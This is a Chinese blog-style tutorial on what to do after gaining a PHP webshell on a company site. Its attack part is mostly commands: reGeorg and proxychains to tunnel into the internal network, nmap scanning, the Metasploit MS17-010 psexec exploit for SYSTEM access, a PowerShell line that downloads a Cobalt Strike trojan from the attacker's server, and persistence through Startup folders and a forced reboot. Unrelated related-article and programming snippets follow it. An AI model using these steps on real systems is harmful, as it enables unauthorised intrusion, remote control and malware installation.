拿到webshell之后的事情
之前搞站都是搞到后台管理员,或者搞到webshell就宣布结束了,,今天终于有机会学习一下后面的操作了。
公司网站为php的站,已经拿到webshell。可以进行菜刀连接。
菜刀虚拟终端
php -m #查看php是否有socket库,因为reGeory需要用到sockets库。
如果没有sockets,则上传的tunnel.php需要添加dl("php_sockers.dll")
reGeorg + proxychains 代理内网
reGeorg 本地代理
python reGeorgSocksProxy.py -p 8080 -u http://222.252.10.101:8080/tunnel.php
#将http://222.252.10.101:8080代理到本地的8080端口
然后复制一个终端,proxychains上场。
注意proxychains的配置信息
vi /etc/proxychains.conf
添加
socket5 127.0.0.1 8080 #端口为上面配置的port
因为reGeorg使用的sockets协议,只支持tcp,所以没法ping通。
proxychains nmap -sT -Pn 172.168.10.50
看到445端口,就要想到ms17-010呀,你也可以proxychains命令行调用一下Nessus扫一下哈
利用msf获取system权限
proxychains -q msfconsole
#-q 不显示proxychains的回显信息
#use exploit/windows/smb/ms17_010_psexec
#set rhost 172.168.10.50
#run
#shell
进入命令行
powershell下载并运行远控
可以用cobaltstrike生成对应系统的木马,将该木马放在自己已有的服务器上。
直接用powershell将木马从远程服务器下载到目标服务器中。
>powershell $client = new-object System.Net.WebClient;$client.DownloadFile(‘http://自己已有服务器ip/zz.exe’,'c:\zz.exe')
或者如果菜刀的权限比较高,可以直接将木马传到开机启动的路径下;
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
#win7的开机启动路径
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
#win10的开机启动路径
#根据服务器windows版本搜索对应的开机启动文件夹的路径
若菜刀权限比较低,可先用菜刀把马传到网站根路径下,再用msf-shell将木马复制到开机启动的路径下。因为有些远控马,必须当前用户启动木马后才有更多的功能,所以,先把远控马传到开机启动的路径下面,再msf使目标机器重启,即可达到目的。。。说的比较啰嗦,但这就是我所理解的,,如果有哪里不对,请您留言告诉我哈。
msf重启目标机器//这一步并不一定得操作。。
shutdown -r -t 0
或 reboot
然后,连远控;;
拿到webshell之后的事情的更多相关文章
- [转]中国最大的Webshell后门箱子调查,所有公开大马全军覆没
起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit(); ...
- Java类WebServer及中间件拿webshell方法总结
0.序 原文名称:Tomcat.Weblogic.JBoss.GlassFish.Resin.Websphere弱口令及拿webshell方法总结 原文from:http://www.hack80.c ...
- 当一名黑客获得一份WebShell后,会做什么
当你获得一份webshell后,你会干嘛? 我曾获得N多webshell.什么discuz.dedecms.phpwind.phpweb.aspcms等等,甚至还包括N多自己研发的线上平台. 可是,问 ...
- Deformity ASP/ASPX Webshell、Webshell Hidden Learning
catalog . Active Server Page(ASP) . ASP.NET . ASP WEBSHELL变形方式 . ASPX WEBSHELL变形方式 . webshell中常见的编码转 ...
- Compiler Theory(编译原理)、词法/语法/AST/中间代码优化在Webshell检测上的应用
catalog . 引论 . 构建一个编译器的相关科学 . 程序设计语言基础 . 一个简单的语法制导翻译器 . 简单表达式的翻译器(源代码示例) . 词法分析 . 生成中间代码 . 词法分析器的实现 ...
- 一次完整的从webshell到域控的探索之路
前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里. 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求. 今天小菜我本着所有师傅们无私分享的精 ...
- webshell在php方向的研究(精华篇)
文章主旨:准备学习c语言,你喜欢的所有干货在文末附件里 作者宗旨:没有不想当将军的兵,没有不想提高技术的person,今天带你打开php的研究之路. 本文作者:Laimooc(原名xoanHn),个人 ...
- 利用“进程注入”实现无文件复活 WebShell
引子 上周末,一个好兄弟找我说一个很重要的目标shell丢了,这个shell之前是通过一个S2代码执行的漏洞拿到的,现在漏洞还在,不过web目录全部不可写,问我有没有办法搞个webshell继续做内网 ...
- Tomcat、Weblogic、JBoss、GlassFish、Resin、Websphere弱口令及拿webshell方法总结 [复制链接]
1.java应用服务器 Java应用服务器主要为应用程序提供运行环境,为组件提供服务.Java 的应用服务器很多,从功能上分为两类:JSP 服务器和 Java EE 服务器.1.1 常见的Se ...
随机推荐
- 实现TabControl 选项卡首个标签缩进的方法
借用一张网图说明需求 在网上找了一圈,没有找到直接通过API或者重绘TabControl 的解决方法,最后灵机一动想到了一个折(tou)中(lan)的解决办法 Tab1.TabPages.Clear( ...
- ant design for vue 上传文件
1.使用customRequest customRequest 通过覆盖默认的上传行为,可以自定义自己的上传实现 Function 定义customRequest,之前定义action行为会被覆盖,可 ...
- Shell遍历目前下后缀名为.xml的文件并替换文件内容
1.shell查找 .xml文件 find /home/esoon/test/external/ -type f -name '*.xml' 2.替换方法 sed -i "s/10.111. ...
- 吴裕雄--天生自然C语言开发:约瑟夫生者死者小游戏
个人在一条船上,超载,需要 人下船. 于是人们排成一队,排队的位置即为他们的编号. 报数,从 开始,数到 的人下船. 如此循环,直到船上仅剩 人为止,问都有哪些编号的人下船了呢? #include&l ...
- 分享一个腾讯域名拦截检测api
接口地址:https://api.oioweb.cn/api/ymjc.php 返回格式:json 请求方式:get 调用示例:https://api.oioweb.cn/api/ymjc.php?u ...
- Java常用基本类库总结
1.String成员方法 boolean equals(Object obj);//判断字符串的内容是否相同,区分大小写. boolean equalsIgnoreCase(String str);/ ...
- python之接口开发
一.接口开发的思路 1.启动一个服务: 2.接受客户端传过来的数据: 3.登录,注册,支付等功能 4.操作数据库,拿到数据: 5.返回数据: import flask server=flask.Fla ...
- Jmeter阶梯式压测
https://www.cnblogs.com/Zfc-Cjk/p/11639219.html 什么是阶梯式压测? 阶梯式压测,就是对系统的压力呈现阶梯性增加的过程,每个阶段压力值都要增加一个数量值, ...
- seek for|contrary to|lag behind|take up|take advantage of|be confident of|allow for |
There are signs ________ restaurants are becoming more popular with families. A. that B. which C. ...
- kafka运行找不到或无法加载主类 Files\Java\jdk1.8.0_131\lib\dt.jar;C:\Program
最近在研究Flink+kafka解决方案, kafka的安装首先需要安装zookeeper,在安装zookeeper是报错找不到或无法加载主类 Files\Java\jdk1.8.0_131\lib\ ...